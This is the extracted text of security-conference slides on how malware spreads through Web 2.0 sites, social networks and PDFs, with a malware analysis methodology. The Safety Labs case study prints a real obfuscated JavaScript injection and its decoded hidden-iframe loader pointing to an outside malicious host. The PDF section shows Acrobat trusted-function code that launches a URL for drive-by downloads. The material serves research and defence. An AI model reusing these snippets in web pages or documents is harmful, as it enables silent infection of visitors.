Scaling Web 2.0 Malware Infection

Scaling Web 2.0 Malware Infection
______________________________________

Aditya K Sood, Sr. Security Practitioner
Armorize , Santa Clara US

Disclaimer

All contents of this presentation represent my own beliefs and views and do not, unless
explicitly stated otherwise, represent the beliefs of my current, or any of my previous in
that effect, employers.

About Me - $whoami

• Senior Security Practitioner , Armorize
http://www.armorize.com

• Founder , SECNICHE Security.
http://www.secniche.org

• Worked previously for COSEINC as Senior Security Researcher and Security
Consultant for KPMG

• Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.
• Like to do Bug Hunting and Malware dissection.
• Released Advisories to Forefront Companies.
• Active Speaker at Security Conferences including RSA etc.

 Agenda

 Understanding The Malware Anatomy

 The Vertical Risk – Malware Impact on Business

 Top 10+ Web Malware Infection Strategies

 2X Generation - Century Malware Trickeries

 Case Study – Infection through PDF Trusted Functions

 Demonstration

 Pattern

Understanding The Malware Anatomy
The Dependent Peripherals

 Malware Mess – Global Trifecta

 Malware Retrospective and Classification

Top 5 Malware Categories Top 5 Virus Families

Trojan (31.2 %) Stuh (4.4 %)

Downloader (25.6 %) Fraudload (3.9 %)

Backdoor (13.8 %) Monder (3.6 %)

Spyware (13.2 %)
Autorun (2.7 %)

Adware (4.9%)
Buzus (2.7 %)

Interdependency

 Malware - The Impact on Real World

 Malware Trends – The Attack Base

 Financial abuse and mass identity theft

 The mass destructor – Botnet infection and zombie hosts

 Exploiting the link dependency – Pay Per click hijacking

 Traffic manipulation – Open redirect vulnerabilities at large scale

 Spywares , crypto virology , ransom ware etc

 Distributed Denial of Service – The service death game , extortion

 Industry change semantics – Malware activation change line

 Infection through browsers and portable gadgets – the biggest step

 Exploiting anti virus loopholes

 Malware Contributing Issues – Rising Steps
 Publicly available malware source code

 Malware distribution framework such MPACK , NeoSploit etc.

 Unpatched vulnerabilities and loosely coupled patches

 Demand of underground services and self exposure

 Global surveillance mode and information stealing in the wild

 Software discrepancies and inherited design flaws such as Browsers.

 Exploitation at web level is easy. It opens a door to System Level Fallacies.

 Inappropriate security solutions deployed and irrelevant security paradigm

 Botnet Infection – The easy way to launch diversified attack

 Web sharing and centralized work functionality.

 Pattern

Understanding The Vertical Risk
Web Delivered Malware Impact on Business

Underground Market and Malware Flow Model

 Underground Malware Market Business - Statistics

© GDATA

 Practical Malware Flow Model

Malware Writers Role

Flow of Malware Websites

© Reihe Informatik. TR-2007-011

 Pattern

Malware – Sources of Infection

Web 2.0
Top 10 + Strategies of Distributing Malware through Web

Long Live Drive By Download – Base Web Malware Tactic

(SEO) Poisoning – Driven with Malware

Messengers – Infection at Instant State

 Networking Websites – TWITTER Malware Infection

 Exploiting the trust relationship on Social Networking Websites

 Spreading malware content through Tweets , Scrapping etc

 Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)

 Social Networking – FACEBOOK Malware Applications

 Manipulating the Open API Calls

 User centric control

 Exploiting the design fallacies

 Social Networking – FACEBOOK MAIL Infection

Step 1

Step 2

Step 3

 Online Media Content – You Tube, Google Videos etc !!

 Exploiting the Web of Trust – Human Touch

 Spywares , Ransom Wares and other Variants etc.

 Insidious Spamming – Email , Blogs , Redirectors etc

Botnets – Malware Infection at Large Scale

 Direct Malware Hosting – Infected Web Domains

 System Stringency – Exploiting the Exceptions

Malware Kits – Automated Infection

 Case Study – Safety Labs Malware Infection

Malware Infecting the Security Service Provider Websites.

____________________________________________________________

It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME
threats or rather say infections

Thousands of websites on internet have been compromised with malicious Iframes which load exploit
code designed to silently install trojans onto susceptible victim computers.

Script Source is

OBFUSCATED JAVASCRIPT http://www.safety-
lab.com/audits/categorylist.pl?lang=en

<SCRIPT LANGUAGE=JAVASCRIPT>
FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35,
59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,
0,58,40,31,60
,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J--
){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W
|=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S-
=2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M
VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9
QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML
E0DMXICGRAD
F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5
Y7@HD')</SCRIPT>


Complexity factor is always high in decoding
DEOBFUSCATED JAVASCRIPT the malicious JavaScript.

(1) DECODED JAVASCRIPT EVALS()

WINDOW.STATUS = 'DONE';
DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() *
14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>')

(2) DECODED JAVASCRIPT WRITES RESULT

<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE">
</IFRAME>

HTTP://3PIGS.INFO/T/?58965B8F “ was
injected as source for malicious file .

 2X Generation Malware Trickeries
 System File Patching and Code Injection

 Code Interdependency – Malware Adjacency - Code Resuscitation.

 Code Randomization, Obfuscation and Morphing

 Rootkits and System Cloaking

 Exploiting Active X and JavaScript Heaps – Direct Control

 Escaping What !

Private & Confidential
Property of Armorize

 Malware Analysis Methodology (MAM) - Overview
End Point Communication
 Connection state check
 Server identity checks through communication medium.
 Error generation like Checksum Integrity.
 Encrypted data in packets.
 Protocol Switching.

Session Stream Analysis – Deep Inspection
Analyzing TCP stream session
 Extracting an executable from the raw data

Behavioral Analysis – Scrutinizing system fallacies
 Active debugging
 Black Box Testing approach

Static Analysis – Reversing the facets of malware
Its all about analyzing the code of Malware

 Case Study – Malware Infection

PDF Trusted Functions
(Understanding the Facets of Malware)

 Some PDF Truths
 Hyperlink execution notification as alerts

 Data is not allowed to be stored in the forms
http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf

 Number of vulnerable functions have been removed i.e. from registered state

 Support for Adobe reader 7.xx has been removed
http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html

 Other alerts have been structured as security checks in standalone PDF’s

 ACRO JS does not support DOM as normal JavaScript does.

Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in
specific environments. For example:- In general, it is not possible to generate another PDF
from the standalone PDF when it is opened

 Understanding Malware Infection - PDF
 Exploiting the browser – Downloading files through Windows Media Player

 Exploiting the Global Access of JavaScript folder in PDF

Hidden gift.js file containing malicious code is placed here

 Calling Codes through Trusted Functions

 Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end
privileges) to enclose any type of function and code to be trusted.

 The trusted functions method can be called successfully on the initialization of the
application and it is possible to call certain number of restricted functions through it.

myTrustedFunction = app.trustedFunction(
function() { <function body> } );

New Scareware Message – Opening a new PDF
trustedDoc = app.trustedFunction( function (width,height)
{ app.beginPriv();
var trustDoc = app.newDoc(width,height);
trustDoc.addWatermarkFromText("X JERKED X");
app.endPriv();
return trustDoc; })
trustedDoc(300,300);

 Calling Codes through Trusted Propagator Functions
myPropagatorFunction = app.trustPropagatorFunction(
function() { <function body> }

URL Opening - Drive by Download Infections

trustedDoc = app.trustedFunction
(
function (cURL, bNewFrame)
{
app.beginPriv();
var trustedDoc = app.launchURL(cURL, bNewFrame);
app.endPriv();
return trustedDoc;
}
)
trustedDoc("http://www.malware1.com",true);

 Thanks and Regards

Special thanks to Armorize for pushing me to do more research.
http://www.armorize.com
__________________________________________________________________________________

Portal and Blog
SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com

(Screenshots shared from various resources)

Scaling Web 2.0 Malware Infection

More Related Content

What's hot

Viewers also liked

Similar to Scaling Web 2.0 Malware Infection

Recently uploaded

Scaling Web 2.0 Malware Infection